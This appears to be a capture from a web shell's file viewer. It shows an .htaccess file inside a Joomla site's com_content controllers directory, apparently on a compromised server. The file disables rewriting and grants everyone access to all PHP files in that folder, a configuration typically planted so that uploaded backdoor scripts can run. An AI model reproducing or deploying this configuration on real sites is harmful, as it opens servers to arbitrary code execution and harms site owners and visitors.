| Current Path : /home/echanges/www/components/com_content/controllers/ |
| Current File : /home/echanges/www/components/com_content/controllers/.htaccess |
<IfModule mod_rewrite.c>
RewriteEngine Off
</IfModule>
<IfModule mod_authz_core.c>
<FilesMatch "\.php$">
Require all granted
</FilesMatch>
</IfModule>
<FilesMatch "\.php$">
Order allow,deny
allow from all
</FilesMatch>